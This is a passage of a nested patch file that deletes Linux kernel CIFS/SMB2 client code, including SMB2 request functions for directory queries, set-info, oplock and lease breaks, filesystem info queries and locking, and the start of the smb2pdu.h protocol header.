+-		cifs_tcon_dbg(VFS, "Invalid search buffer type\n");
+-
+-	return 0;
+-}
+-
+-int
+-SMB2_query_directory(const unsigned int xid, struct cifs_tcon *tcon,
+-		     u64 persistent_fid, u64 volatile_fid, int index,
+-		     struct cifs_search_info *srch_inf)
+-{
+-	struct smb_rqst rqst;
+-	struct kvec iov[SMB2_QUERY_DIRECTORY_IOV_SIZE];
+-	struct smb2_query_directory_rsp *rsp = NULL;
+-	int resp_buftype = CIFS_NO_BUFFER;
+-	struct kvec rsp_iov;
+-	int rc = 0;
+-	struct cifs_ses *ses = tcon->ses;
+-	struct TCP_Server_Info *server = cifs_pick_channel(ses);
+-	int flags = 0;
+-
+-	if (!ses || !(ses->server))
+-		return -EIO;
+-
+-	if (smb3_encryption_required(tcon))
+-		flags |= CIFS_TRANSFORM_REQ;
+-
+-	memset(&rqst, 0, sizeof(struct smb_rqst));
+-	memset(&iov, 0, sizeof(iov));
+-	rqst.rq_iov = iov;
+-	rqst.rq_nvec = SMB2_QUERY_DIRECTORY_IOV_SIZE;
+-
+-	rc = SMB2_query_directory_init(xid, tcon, server,
+-				       &rqst, persistent_fid,
+-				       volatile_fid, index,
+-				       srch_inf->info_level);
+-	if (rc)
+-		goto qdir_exit;
+-
+-	rc = cifs_send_recv(xid, ses, server,
+-			    &rqst, &resp_buftype, flags, &rsp_iov);
+-	rsp = (struct smb2_query_directory_rsp *)rsp_iov.iov_base;
+-
+-	if (rc) {
+-		if (rc == -ENODATA &&
+-		    rsp->hdr.Status == STATUS_NO_MORE_FILES) {
+-			trace_smb3_query_dir_done(xid, persistent_fid,
+-				tcon->tid, tcon->ses->Suid, index, 0);
+-			srch_inf->endOfSearch = true;
+-			rc = 0;
+-		} else {
+-			trace_smb3_query_dir_err(xid, persistent_fid, tcon->tid,
+-				tcon->ses->Suid, index, 0, rc);
+-			cifs_stats_fail_inc(tcon, SMB2_QUERY_DIRECTORY_HE);
+-		}
+-		goto qdir_exit;
+-	}
+-
+-	rc = smb2_parse_query_directory(tcon, &rsp_iov,	resp_buftype,
+-					srch_inf);
+-	if (rc) {
+-		trace_smb3_query_dir_err(xid, persistent_fid, tcon->tid,
+-			tcon->ses->Suid, index, 0, rc);
+-		goto qdir_exit;
+-	}
+-	resp_buftype = CIFS_NO_BUFFER;
+-
+-	trace_smb3_query_dir_done(xid, persistent_fid, tcon->tid,
+-			tcon->ses->Suid, index, srch_inf->entries_in_buffer);
+-
+-qdir_exit:
+-	SMB2_query_directory_free(&rqst);
+-	free_rsp_buf(resp_buftype, rsp);
+-	return rc;
+-}
+-
+-int
+-SMB2_set_info_init(struct cifs_tcon *tcon, struct TCP_Server_Info *server,
+-		   struct smb_rqst *rqst,
+-		   u64 persistent_fid, u64 volatile_fid, u32 pid,
+-		   u8 info_class, u8 info_type, u32 additional_info,
+-		   void **data, unsigned int *size)
+-{
+-	struct smb2_set_info_req *req;
+-	struct kvec *iov = rqst->rq_iov;
+-	unsigned int i, total_len;
+-	int rc;
+-
+-	rc = smb2_plain_req_init(SMB2_SET_INFO, tcon, server,
+-				 (void **) &req, &total_len);
+-	if (rc)
+-		return rc;
+-
+-	req->hdr.Id.SyncId.ProcessId = cpu_to_le32(pid);
+-	req->InfoType = info_type;
+-	req->FileInfoClass = info_class;
+-	req->PersistentFileId = persistent_fid;
+-	req->VolatileFileId = volatile_fid;
+-	req->AdditionalInformation = cpu_to_le32(additional_info);
+-
+-	req->BufferOffset =
+-			cpu_to_le16(sizeof(struct smb2_set_info_req) - 1);
+-	req->BufferLength = cpu_to_le32(*size);
+-
+-	memcpy(req->Buffer, *data, *size);
+-	total_len += *size;
+-
+-	iov[0].iov_base = (char *)req;
+-	/* 1 for Buffer */
+-	iov[0].iov_len = total_len - 1;
+-
+-	for (i = 1; i < rqst->rq_nvec; i++) {
+-		le32_add_cpu(&req->BufferLength, size[i]);
+-		iov[i].iov_base = (char *)data[i];
+-		iov[i].iov_len = size[i];
+-	}
+-
+-	return 0;
+-}
+-
+-void
+-SMB2_set_info_free(struct smb_rqst *rqst)
+-{
+-	if (rqst && rqst->rq_iov)
+-		cifs_buf_release(rqst->rq_iov[0].iov_base); /* request */
+-}
+-
+-static int
+-send_set_info(const unsigned int xid, struct cifs_tcon *tcon,
+-	       u64 persistent_fid, u64 volatile_fid, u32 pid, u8 info_class,
+-	       u8 info_type, u32 additional_info, unsigned int num,
+-		void **data, unsigned int *size)
+-{
+-	struct smb_rqst rqst;
+-	struct smb2_set_info_rsp *rsp = NULL;
+-	struct kvec *iov;
+-	struct kvec rsp_iov;
+-	int rc = 0;
+-	int resp_buftype;
+-	struct cifs_ses *ses = tcon->ses;
+-	struct TCP_Server_Info *server = cifs_pick_channel(ses);
+-	int flags = 0;
+-
+-	if (!ses || !server)
+-		return -EIO;
+-
+-	if (!num)
+-		return -EINVAL;
+-
+-	if (smb3_encryption_required(tcon))
+-		flags |= CIFS_TRANSFORM_REQ;
+-
+-	iov = kmalloc_array(num, sizeof(struct kvec), GFP_KERNEL);
+-	if (!iov)
+-		return -ENOMEM;
+-
+-	memset(&rqst, 0, sizeof(struct smb_rqst));
+-	rqst.rq_iov = iov;
+-	rqst.rq_nvec = num;
+-
+-	rc = SMB2_set_info_init(tcon, server,
+-				&rqst, persistent_fid, volatile_fid, pid,
+-				info_class, info_type, additional_info,
+-				data, size);
+-	if (rc) {
+-		kfree(iov);
+-		return rc;
+-	}
+-
+-
+-	rc = cifs_send_recv(xid, ses, server,
+-			    &rqst, &resp_buftype, flags,
+-			    &rsp_iov);
+-	SMB2_set_info_free(&rqst);
+-	rsp = (struct smb2_set_info_rsp *)rsp_iov.iov_base;
+-
+-	if (rc != 0) {
+-		cifs_stats_fail_inc(tcon, SMB2_SET_INFO_HE);
+-		trace_smb3_set_info_err(xid, persistent_fid, tcon->tid,
+-				ses->Suid, info_class, (__u32)info_type, rc);
+-	}
+-
+-	free_rsp_buf(resp_buftype, rsp);
+-	kfree(iov);
+-	return rc;
+-}
+-
+-int
+-SMB2_set_eof(const unsigned int xid, struct cifs_tcon *tcon, u64 persistent_fid,
+-	     u64 volatile_fid, u32 pid, __le64 *eof)
+-{
+-	struct smb2_file_eof_info info;
+-	void *data;
+-	unsigned int size;
+-
+-	info.EndOfFile = *eof;
+-
+-	data = &info;
+-	size = sizeof(struct smb2_file_eof_info);
+-
+-	trace_smb3_set_eof(xid, persistent_fid, tcon->tid, tcon->ses->Suid, le64_to_cpu(*eof));
+-
+-	return send_set_info(xid, tcon, persistent_fid, volatile_fid,
+-			pid, FILE_END_OF_FILE_INFORMATION, SMB2_O_INFO_FILE,
+-			0, 1, &data, &size);
+-}
+-
+-int
+-SMB2_set_acl(const unsigned int xid, struct cifs_tcon *tcon,
+-		u64 persistent_fid, u64 volatile_fid,
+-		struct cifs_ntsd *pnntsd, int pacllen, int aclflag)
+-{
+-	return send_set_info(xid, tcon, persistent_fid, volatile_fid,
+-			current->tgid, 0, SMB2_O_INFO_SECURITY, aclflag,
+-			1, (void **)&pnntsd, &pacllen);
+-}
+-
+-int
+-SMB2_set_ea(const unsigned int xid, struct cifs_tcon *tcon,
+-	    u64 persistent_fid, u64 volatile_fid,
+-	    struct smb2_file_full_ea_info *buf, int len)
+-{
+-	return send_set_info(xid, tcon, persistent_fid, volatile_fid,
+-		current->tgid, FILE_FULL_EA_INFORMATION, SMB2_O_INFO_FILE,
+-		0, 1, (void **)&buf, &len);
+-}
+-
+-int
+-SMB2_oplock_break(const unsigned int xid, struct cifs_tcon *tcon,
+-		  const u64 persistent_fid, const u64 volatile_fid,
+-		  __u8 oplock_level)
+-{
+-	struct smb_rqst rqst;
+-	int rc;
+-	struct smb2_oplock_break *req = NULL;
+-	struct cifs_ses *ses = tcon->ses;
+-	struct TCP_Server_Info *server = cifs_pick_channel(ses);
+-	int flags = CIFS_OBREAK_OP;
+-	unsigned int total_len;
+-	struct kvec iov[1];
+-	struct kvec rsp_iov;
+-	int resp_buf_type;
+-
+-	cifs_dbg(FYI, "SMB2_oplock_break\n");
+-	rc = smb2_plain_req_init(SMB2_OPLOCK_BREAK, tcon, server,
+-				 (void **) &req, &total_len);
+-	if (rc)
+-		return rc;
+-
+-	if (smb3_encryption_required(tcon))
+-		flags |= CIFS_TRANSFORM_REQ;
+-
+-	req->VolatileFid = volatile_fid;
+-	req->PersistentFid = persistent_fid;
+-	req->OplockLevel = oplock_level;
+-	req->hdr.CreditRequest = cpu_to_le16(1);
+-
+-	flags |= CIFS_NO_RSP_BUF;
+-
+-	iov[0].iov_base = (char *)req;
+-	iov[0].iov_len = total_len;
+-
+-	memset(&rqst, 0, sizeof(struct smb_rqst));
+-	rqst.rq_iov = iov;
+-	rqst.rq_nvec = 1;
+-
+-	rc = cifs_send_recv(xid, ses, server,
+-			    &rqst, &resp_buf_type, flags, &rsp_iov);
+-	cifs_small_buf_release(req);
+-
+-	if (rc) {
+-		cifs_stats_fail_inc(tcon, SMB2_OPLOCK_BREAK_HE);
+-		cifs_dbg(FYI, "Send error in Oplock Break = %d\n", rc);
+-	}
+-
+-	return rc;
+-}
+-
+-void
+-smb2_copy_fs_info_to_kstatfs(struct smb2_fs_full_size_info *pfs_inf,
+-			     struct kstatfs *kst)
+-{
+-	kst->f_bsize = le32_to_cpu(pfs_inf->BytesPerSector) *
+-			  le32_to_cpu(pfs_inf->SectorsPerAllocationUnit);
+-	kst->f_blocks = le64_to_cpu(pfs_inf->TotalAllocationUnits);
+-	kst->f_bfree  = kst->f_bavail =
+-			le64_to_cpu(pfs_inf->CallerAvailableAllocationUnits);
+-	return;
+-}
+-
+-static void
+-copy_posix_fs_info_to_kstatfs(FILE_SYSTEM_POSIX_INFO *response_data,
+-			struct kstatfs *kst)
+-{
+-	kst->f_bsize = le32_to_cpu(response_data->BlockSize);
+-	kst->f_blocks = le64_to_cpu(response_data->TotalBlocks);
+-	kst->f_bfree =  le64_to_cpu(response_data->BlocksAvail);
+-	if (response_data->UserBlocksAvail == cpu_to_le64(-1))
+-		kst->f_bavail = kst->f_bfree;
+-	else
+-		kst->f_bavail = le64_to_cpu(response_data->UserBlocksAvail);
+-	if (response_data->TotalFileNodes != cpu_to_le64(-1))
+-		kst->f_files = le64_to_cpu(response_data->TotalFileNodes);
+-	if (response_data->FreeFileNodes != cpu_to_le64(-1))
+-		kst->f_ffree = le64_to_cpu(response_data->FreeFileNodes);
+-
+-	return;
+-}
+-
+-static int
+-build_qfs_info_req(struct kvec *iov, struct cifs_tcon *tcon,
+-		   struct TCP_Server_Info *server,
+-		   int level, int outbuf_len, u64 persistent_fid,
+-		   u64 volatile_fid)
+-{
+-	int rc;
+-	struct smb2_query_info_req *req;
+-	unsigned int total_len;
+-
+-	cifs_dbg(FYI, "Query FSInfo level %d\n", level);
+-
+-	if ((tcon->ses == NULL) || server == NULL)
+-		return -EIO;
+-
+-	rc = smb2_plain_req_init(SMB2_QUERY_INFO, tcon, server,
+-				 (void **) &req, &total_len);
+-	if (rc)
+-		return rc;
+-
+-	req->InfoType = SMB2_O_INFO_FILESYSTEM;
+-	req->FileInfoClass = level;
+-	req->PersistentFileId = persistent_fid;
+-	req->VolatileFileId = volatile_fid;
+-	/* 1 for pad */
+-	req->InputBufferOffset =
+-			cpu_to_le16(sizeof(struct smb2_query_info_req) - 1);
+-	req->OutputBufferLength = cpu_to_le32(
+-		outbuf_len + sizeof(struct smb2_query_info_rsp) - 1);
+-
+-	iov->iov_base = (char *)req;
+-	iov->iov_len = total_len;
+-	return 0;
+-}
+-
+-int
+-SMB311_posix_qfs_info(const unsigned int xid, struct cifs_tcon *tcon,
+-	      u64 persistent_fid, u64 volatile_fid, struct kstatfs *fsdata)
+-{
+-	struct smb_rqst rqst;
+-	struct smb2_query_info_rsp *rsp = NULL;
+-	struct kvec iov;
+-	struct kvec rsp_iov;
+-	int rc = 0;
+-	int resp_buftype;
+-	struct cifs_ses *ses = tcon->ses;
+-	struct TCP_Server_Info *server = cifs_pick_channel(ses);
+-	FILE_SYSTEM_POSIX_INFO *info = NULL;
+-	int flags = 0;
+-
+-	rc = build_qfs_info_req(&iov, tcon, server,
+-				FS_POSIX_INFORMATION,
+-				sizeof(FILE_SYSTEM_POSIX_INFO),
+-				persistent_fid, volatile_fid);
+-	if (rc)
+-		return rc;
+-
+-	if (smb3_encryption_required(tcon))
+-		flags |= CIFS_TRANSFORM_REQ;
+-
+-	memset(&rqst, 0, sizeof(struct smb_rqst));
+-	rqst.rq_iov = &iov;
+-	rqst.rq_nvec = 1;
+-
+-	rc = cifs_send_recv(xid, ses, server,
+-			    &rqst, &resp_buftype, flags, &rsp_iov);
+-	cifs_small_buf_release(iov.iov_base);
+-	if (rc) {
+-		cifs_stats_fail_inc(tcon, SMB2_QUERY_INFO_HE);
+-		goto posix_qfsinf_exit;
+-	}
+-	rsp = (struct smb2_query_info_rsp *)rsp_iov.iov_base;
+-
+-	info = (FILE_SYSTEM_POSIX_INFO *)(
+-		le16_to_cpu(rsp->OutputBufferOffset) + (char *)rsp);
+-	rc = smb2_validate_iov(le16_to_cpu(rsp->OutputBufferOffset),
+-			       le32_to_cpu(rsp->OutputBufferLength), &rsp_iov,
+-			       sizeof(FILE_SYSTEM_POSIX_INFO));
+-	if (!rc)
+-		copy_posix_fs_info_to_kstatfs(info, fsdata);
+-
+-posix_qfsinf_exit:
+-	free_rsp_buf(resp_buftype, rsp_iov.iov_base);
+-	return rc;
+-}
+-
+-int
+-SMB2_QFS_info(const unsigned int xid, struct cifs_tcon *tcon,
+-	      u64 persistent_fid, u64 volatile_fid, struct kstatfs *fsdata)
+-{
+-	struct smb_rqst rqst;
+-	struct smb2_query_info_rsp *rsp = NULL;
+-	struct kvec iov;
+-	struct kvec rsp_iov;
+-	int rc = 0;
+-	int resp_buftype;
+-	struct cifs_ses *ses = tcon->ses;
+-	struct TCP_Server_Info *server = cifs_pick_channel(ses);
+-	struct smb2_fs_full_size_info *info = NULL;
+-	int flags = 0;
+-
+-	rc = build_qfs_info_req(&iov, tcon, server,
+-				FS_FULL_SIZE_INFORMATION,
+-				sizeof(struct smb2_fs_full_size_info),
+-				persistent_fid, volatile_fid);
+-	if (rc)
+-		return rc;
+-
+-	if (smb3_encryption_required(tcon))
+-		flags |= CIFS_TRANSFORM_REQ;
+-
+-	memset(&rqst, 0, sizeof(struct smb_rqst));
+-	rqst.rq_iov = &iov;
+-	rqst.rq_nvec = 1;
+-
+-	rc = cifs_send_recv(xid, ses, server,
+-			    &rqst, &resp_buftype, flags, &rsp_iov);
+-	cifs_small_buf_release(iov.iov_base);
+-	if (rc) {
+-		cifs_stats_fail_inc(tcon, SMB2_QUERY_INFO_HE);
+-		goto qfsinf_exit;
+-	}
+-	rsp = (struct smb2_query_info_rsp *)rsp_iov.iov_base;
+-
+-	info = (struct smb2_fs_full_size_info *)(
+-		le16_to_cpu(rsp->OutputBufferOffset) + (char *)rsp);
+-	rc = smb2_validate_iov(le16_to_cpu(rsp->OutputBufferOffset),
+-			       le32_to_cpu(rsp->OutputBufferLength), &rsp_iov,
+-			       sizeof(struct smb2_fs_full_size_info));
+-	if (!rc)
+-		smb2_copy_fs_info_to_kstatfs(info, fsdata);
+-
+-qfsinf_exit:
+-	free_rsp_buf(resp_buftype, rsp_iov.iov_base);
+-	return rc;
+-}
+-
+-int
+-SMB2_QFS_attr(const unsigned int xid, struct cifs_tcon *tcon,
+-	      u64 persistent_fid, u64 volatile_fid, int level)
+-{
+-	struct smb_rqst rqst;
+-	struct smb2_query_info_rsp *rsp = NULL;
+-	struct kvec iov;
+-	struct kvec rsp_iov;
+-	int rc = 0;
+-	int resp_buftype, max_len, min_len;
+-	struct cifs_ses *ses = tcon->ses;
+-	struct TCP_Server_Info *server = cifs_pick_channel(ses);
+-	unsigned int rsp_len, offset;
+-	int flags = 0;
+-
+-	if (level == FS_DEVICE_INFORMATION) {
+-		max_len = sizeof(FILE_SYSTEM_DEVICE_INFO);
+-		min_len = sizeof(FILE_SYSTEM_DEVICE_INFO);
+-	} else if (level == FS_ATTRIBUTE_INFORMATION) {
+-		max_len = sizeof(FILE_SYSTEM_ATTRIBUTE_INFO);
+-		min_len = MIN_FS_ATTR_INFO_SIZE;
+-	} else if (level == FS_SECTOR_SIZE_INFORMATION) {
+-		max_len = sizeof(struct smb3_fs_ss_info);
+-		min_len = sizeof(struct smb3_fs_ss_info);
+-	} else if (level == FS_VOLUME_INFORMATION) {
+-		max_len = sizeof(struct smb3_fs_vol_info) + MAX_VOL_LABEL_LEN;
+-		min_len = sizeof(struct smb3_fs_vol_info);
+-	} else {
+-		cifs_dbg(FYI, "Invalid qfsinfo level %d\n", level);
+-		return -EINVAL;
+-	}
+-
+-	rc = build_qfs_info_req(&iov, tcon, server,
+-				level, max_len,
+-				persistent_fid, volatile_fid);
+-	if (rc)
+-		return rc;
+-
+-	if (smb3_encryption_required(tcon))
+-		flags |= CIFS_TRANSFORM_REQ;
+-
+-	memset(&rqst, 0, sizeof(struct smb_rqst));
+-	rqst.rq_iov = &iov;
+-	rqst.rq_nvec = 1;
+-
+-	rc = cifs_send_recv(xid, ses, server,
+-			    &rqst, &resp_buftype, flags, &rsp_iov);
+-	cifs_small_buf_release(iov.iov_base);
+-	if (rc) {
+-		cifs_stats_fail_inc(tcon, SMB2_QUERY_INFO_HE);
+-		goto qfsattr_exit;
+-	}
+-	rsp = (struct smb2_query_info_rsp *)rsp_iov.iov_base;
+-
+-	rsp_len = le32_to_cpu(rsp->OutputBufferLength);
+-	offset = le16_to_cpu(rsp->OutputBufferOffset);
+-	rc = smb2_validate_iov(offset, rsp_len, &rsp_iov, min_len);
+-	if (rc)
+-		goto qfsattr_exit;
+-
+-	if (level == FS_ATTRIBUTE_INFORMATION)
+-		memcpy(&tcon->fsAttrInfo, offset
+-			+ (char *)rsp, min_t(unsigned int,
+-			rsp_len, max_len));
+-	else if (level == FS_DEVICE_INFORMATION)
+-		memcpy(&tcon->fsDevInfo, offset
+-			+ (char *)rsp, sizeof(FILE_SYSTEM_DEVICE_INFO));
+-	else if (level == FS_SECTOR_SIZE_INFORMATION) {
+-		struct smb3_fs_ss_info *ss_info = (struct smb3_fs_ss_info *)
+-			(offset + (char *)rsp);
+-		tcon->ss_flags = le32_to_cpu(ss_info->Flags);
+-		tcon->perf_sector_size =
+-			le32_to_cpu(ss_info->PhysicalBytesPerSectorForPerf);
+-	} else if (level == FS_VOLUME_INFORMATION) {
+-		struct smb3_fs_vol_info *vol_info = (struct smb3_fs_vol_info *)
+-			(offset + (char *)rsp);
+-		tcon->vol_serial_number = vol_info->VolumeSerialNumber;
+-		tcon->vol_create_time = vol_info->VolumeCreationTime;
+-	}
+-
+-qfsattr_exit:
+-	free_rsp_buf(resp_buftype, rsp_iov.iov_base);
+-	return rc;
+-}
+-
+-int
+-smb2_lockv(const unsigned int xid, struct cifs_tcon *tcon,
+-	   const __u64 persist_fid, const __u64 volatile_fid, const __u32 pid,
+-	   const __u32 num_lock, struct smb2_lock_element *buf)
+-{
+-	struct smb_rqst rqst;
+-	int rc = 0;
+-	struct smb2_lock_req *req = NULL;
+-	struct kvec iov[2];
+-	struct kvec rsp_iov;
+-	int resp_buf_type;
+-	unsigned int count;
+-	int flags = CIFS_NO_RSP_BUF;
+-	unsigned int total_len;
+-	struct TCP_Server_Info *server = cifs_pick_channel(tcon->ses);
+-
+-	cifs_dbg(FYI, "smb2_lockv num lock %d\n", num_lock);
+-
+-	rc = smb2_plain_req_init(SMB2_LOCK, tcon, server,
+-				 (void **) &req, &total_len);
+-	if (rc)
+-		return rc;
+-
+-	if (smb3_encryption_required(tcon))
+-		flags |= CIFS_TRANSFORM_REQ;
+-
+-	req->hdr.Id.SyncId.ProcessId = cpu_to_le32(pid);
+-	req->LockCount = cpu_to_le16(num_lock);
+-
+-	req->PersistentFileId = persist_fid;
+-	req->VolatileFileId = volatile_fid;
+-
+-	count = num_lock * sizeof(struct smb2_lock_element);
+-
+-	iov[0].iov_base = (char *)req;
+-	iov[0].iov_len = total_len - sizeof(struct smb2_lock_element);
+-	iov[1].iov_base = (char *)buf;
+-	iov[1].iov_len = count;
+-
+-	cifs_stats_inc(&tcon->stats.cifs_stats.num_locks);
+-
+-	memset(&rqst, 0, sizeof(struct smb_rqst));
+-	rqst.rq_iov = iov;
+-	rqst.rq_nvec = 2;
+-
+-	rc = cifs_send_recv(xid, tcon->ses, server,
+-			    &rqst, &resp_buf_type, flags,
+-			    &rsp_iov);
+-	cifs_small_buf_release(req);
+-	if (rc) {
+-		cifs_dbg(FYI, "Send error in smb2_lockv = %d\n", rc);
+-		cifs_stats_fail_inc(tcon, SMB2_LOCK_HE);
+-		trace_smb3_lock_err(xid, persist_fid, tcon->tid,
+-				    tcon->ses->Suid, rc);
+-	}
+-
+-	return rc;
+-}
+-
+-int
+-SMB2_lock(const unsigned int xid, struct cifs_tcon *tcon,
+-	  const __u64 persist_fid, const __u64 volatile_fid, const __u32 pid,
+-	  const __u64 length, const __u64 offset, const __u32 lock_flags,
+-	  const bool wait)
+-{
+-	struct smb2_lock_element lock;
+-
+-	lock.Offset = cpu_to_le64(offset);
+-	lock.Length = cpu_to_le64(length);
+-	lock.Flags = cpu_to_le32(lock_flags);
+-	if (!wait && lock_flags != SMB2_LOCKFLAG_UNLOCK)
+-		lock.Flags |= cpu_to_le32(SMB2_LOCKFLAG_FAIL_IMMEDIATELY);
+-
+-	return smb2_lockv(xid, tcon, persist_fid, volatile_fid, pid, 1, &lock);
+-}
+-
+-int
+-SMB2_lease_break(const unsigned int xid, struct cifs_tcon *tcon,
+-		 __u8 *lease_key, const __le32 lease_state)
+-{
+-	struct smb_rqst rqst;
+-	int rc;
+-	struct smb2_lease_ack *req = NULL;
+-	struct cifs_ses *ses = tcon->ses;
+-	int flags = CIFS_OBREAK_OP;
+-	unsigned int total_len;
+-	struct kvec iov[1];
+-	struct kvec rsp_iov;
+-	int resp_buf_type;
+-	__u64 *please_key_high;
+-	__u64 *please_key_low;
+-	struct TCP_Server_Info *server = cifs_pick_channel(tcon->ses);
+-
+-	cifs_dbg(FYI, "SMB2_lease_break\n");
+-	rc = smb2_plain_req_init(SMB2_OPLOCK_BREAK, tcon, server,
+-				 (void **) &req, &total_len);
+-	if (rc)
+-		return rc;
+-
+-	if (smb3_encryption_required(tcon))
+-		flags |= CIFS_TRANSFORM_REQ;
+-
+-	req->hdr.CreditRequest = cpu_to_le16(1);
+-	req->StructureSize = cpu_to_le16(36);
+-	total_len += 12;
+-
+-	memcpy(req->LeaseKey, lease_key, 16);
+-	req->LeaseState = lease_state;
+-
+-	flags |= CIFS_NO_RSP_BUF;
+-
+-	iov[0].iov_base = (char *)req;
+-	iov[0].iov_len = total_len;
+-
+-	memset(&rqst, 0, sizeof(struct smb_rqst));
+-	rqst.rq_iov = iov;
+-	rqst.rq_nvec = 1;
+-
+-	rc = cifs_send_recv(xid, ses, server,
+-			    &rqst, &resp_buf_type, flags, &rsp_iov);
+-	cifs_small_buf_release(req);
+-
+-	please_key_low = (__u64 *)lease_key;
+-	please_key_high = (__u64 *)(lease_key+8);
+-	if (rc) {
+-		cifs_stats_fail_inc(tcon, SMB2_OPLOCK_BREAK_HE);
+-		trace_smb3_lease_err(le32_to_cpu(lease_state), tcon->tid,
+-			ses->Suid, *please_key_low, *please_key_high, rc);
+-		cifs_dbg(FYI, "Send error in Lease Break = %d\n", rc);
+-	} else
+-		trace_smb3_lease_done(le32_to_cpu(lease_state), tcon->tid,
+-			ses->Suid, *please_key_low, *please_key_high);
+-
+-	return rc;
+-}
+diff --git a/fs/cifs/smb2pdu.h b/fs/cifs/smb2pdu.h
+deleted file mode 100644
+index 1237bb86e93a8..0000000000000
+--- a/fs/cifs/smb2pdu.h
++++ /dev/null
+@@ -1,434 +0,0 @@
+-/* SPDX-License-Identifier: LGPL-2.1 */
+-/*
+- *
+- *   Copyright (c) International Business Machines  Corp., 2009, 2013
+- *                 Etersoft, 2012
+- *   Author(s): Steve French (sfrench@us.ibm.com)
+- *              Pavel Shilovsky (pshilovsky@samba.org) 2012
+- *
+- */
+-
+-#ifndef _SMB2PDU_H
+-#define _SMB2PDU_H
+-
+-#include <net/sock.h>
+-#include "cifsacl.h"
+-
+-/* 52 transform hdr + 64 hdr + 88 create rsp */
+-#define SMB2_TRANSFORM_HEADER_SIZE 52
+-#define MAX_SMB2_HDR_SIZE 204
+-
+-/* The total header size for SMB2 read and write */
+-#define SMB2_READWRITE_PDU_HEADER_SIZE (48 + sizeof(struct smb2_hdr))
+-
+-/* See MS-SMB2 2.2.43 */
+-struct smb2_rdma_transform {
+-	__le16 RdmaDescriptorOffset;
+-	__le16 RdmaDescriptorLength;
+-	__le32 Channel; /* for values see channel description in smb2 read above */
+-	__le16 TransformCount;
+-	__le16 Reserved1;
+-	__le32 Reserved2;
+-} __packed;
+-
+-/* TransformType */
+-#define SMB2_RDMA_TRANSFORM_TYPE_ENCRYPTION	0x0001
+-#define SMB2_RDMA_TRANSFORM_TYPE_SIGNING	0x0002
+-
+-struct smb2_rdma_crypto_transform {
+-	__le16	TransformType;
+-	__le16	SignatureLength;
+-	__le16	NonceLength;
+-	__u16	Reserved;
+-	__u8	Signature[]; /* variable length */
+-	/* u8 Nonce[] */
+-	/* followed by padding */
+-} __packed;
+-
+-/*
+- *	Definitions for SMB2 Protocol Data Units (network frames)
+- *
+- *  See MS-SMB2.PDF specification for protocol details.
+- *  The Naming convention is the lower case version of the SMB2
+- *  command code name for the struct. Note that structures must be packed.
+- *
+- */
+-
+-#define COMPOUND_FID 0xFFFFFFFFFFFFFFFFULL
+-
+-#define SMB2_SYMLINK_STRUCT_SIZE \
+-	(sizeof(struct smb2_err_rsp) - 1 + sizeof(struct smb2_symlink_err_rsp))
+-
+-#define SYMLINK_ERROR_TAG 0x4c4d5953
+-
+-struct smb2_symlink_err_rsp {
+-	__le32 SymLinkLength;
+-	__le32 SymLinkErrorTag;
+-	__le32 ReparseTag;
+-	__le16 ReparseDataLength;
+-	__le16 UnparsedPathLength;
+-	__le16 SubstituteNameOffset;
+-	__le16 SubstituteNameLength;
+-	__le16 PrintNameOffset;
+-	__le16 PrintNameLength;
+-	__le32 Flags;
+-	__u8  PathBuffer[];
+-} __packed;
+-
+-/* SMB 3.1.1 and later dialects. See MS-SMB2 section 2.2.2.1 */
+-struct smb2_error_context_rsp {
+-	__le32 ErrorDataLength;
+-	__le32 ErrorId;
+-	__u8  ErrorContextData; /* ErrorDataLength long array */
+-} __packed;
+-
+-/* ErrorId values */
+-#define SMB2_ERROR_ID_DEFAULT		0x00000000
+-#define SMB2_ERROR_ID_SHARE_REDIRECT	cpu_to_le32(0x72645253)	/* "rdRS" */
+-
+-/* Defines for Type field below (see MS-SMB2 2.2.2.2.2.1) */
+-#define MOVE_DST_IPADDR_V4	cpu_to_le32(0x00000001)
+-#define MOVE_DST_IPADDR_V6	cpu_to_le32(0x00000002)
+-
+-struct move_dst_ipaddr {
+-	__le32 Type;
+-	__u32  Reserved;
+-	__u8   address[16]; /* IPv4 followed by 12 bytes rsvd or IPv6 address */
+-} __packed;
+-
+-struct share_redirect_error_context_rsp {
+-	__le32 StructureSize;
+-	__le32 NotificationType;
+-	__le32 ResourceNameOffset;
+-	__le32 ResourceNameLength;
+-	__le16 Reserved;
+-	__le16 TargetType;
+-	__le32 IPAddrCount;
+-	struct move_dst_ipaddr IpAddrMoveList[];
+-	/* __u8 ResourceName[] */ /* Name of share as counted Unicode string */
+-} __packed;
+-
+-/*
+- * Maximum number of iovs we need for an open/create request.
+- * [0] : struct smb2_create_req
+- * [1] : path
+- * [2] : lease context
+- * [3] : durable context
+- * [4] : posix context
+- * [5] : time warp context
+- * [6] : query id context
+- * [7] : compound padding
+- */
+-#define SMB2_CREATE_IOV_SIZE 8
+-
+-/*
+- * Maximum size of a SMB2_CREATE response is 64 (smb2 header) +
+- * 88 (fixed part of create response) + 520 (path) + 208 (contexts) +
+- * 2 bytes of padding.
+- */
+-#define MAX_SMB2_CREATE_RESPONSE_SIZE 880
+-
+-#define SMB2_LEASE_READ_CACHING_HE	0x01
+-#define SMB2_LEASE_HANDLE_CACHING_HE	0x02
+-#define SMB2_LEASE_WRITE_CACHING_HE	0x04
+-
+-struct create_durable {
+-	struct create_context ccontext;
+-	__u8   Name[8];
+-	union {
+-		__u8  Reserved[16];
+-		struct {
+-			__u64 PersistentFileId;
+-			__u64 VolatileFileId;
+-		} Fid;
+-	} Data;
+-} __packed;
+-
+-/* See MS-SMB2 2.2.13.2.11 */
+-/* Flags */
+-#define SMB2_DHANDLE_FLAG_PERSISTENT	0x00000002
+-struct durable_context_v2 {
+-	__le32 Timeout;
+-	__le32 Flags;
+-	__u64 Reserved;
+-	__u8 CreateGuid[16];
+-} __packed;
+-
+-struct create_durable_v2 {
+-	struct create_context ccontext;
+-	__u8   Name[8];
+-	struct durable_context_v2 dcontext;
+-} __packed;
+-
+-/* See MS-SMB2 2.2.13.2.12 */
+-struct durable_reconnect_context_v2 {
+-	struct {
+-		__u64 PersistentFileId;
+-		__u64 VolatileFileId;
+-	} Fid;
+-	__u8 CreateGuid[16];
+-	__le32 Flags; /* see above DHANDLE_FLAG_PERSISTENT */
+-} __packed;
+-
+-/* See MS-SMB2 2.2.14.2.9 */
+-struct create_on_disk_id {
+-	struct create_context ccontext;
+-	__u8   Name[8];
+-	__le64 DiskFileId;
+-	__le64 VolumeId;
+-	__u32  Reserved[4];
+-} __packed;
+-
+-/* See MS-SMB2 2.2.14.2.12 */
+-struct durable_reconnect_context_v2_rsp {
+-	__le32 Timeout;
+-	__le32 Flags; /* see above DHANDLE_FLAG_PERSISTENT */
+-} __packed;
+-
+-struct create_durable_handle_reconnect_v2 {
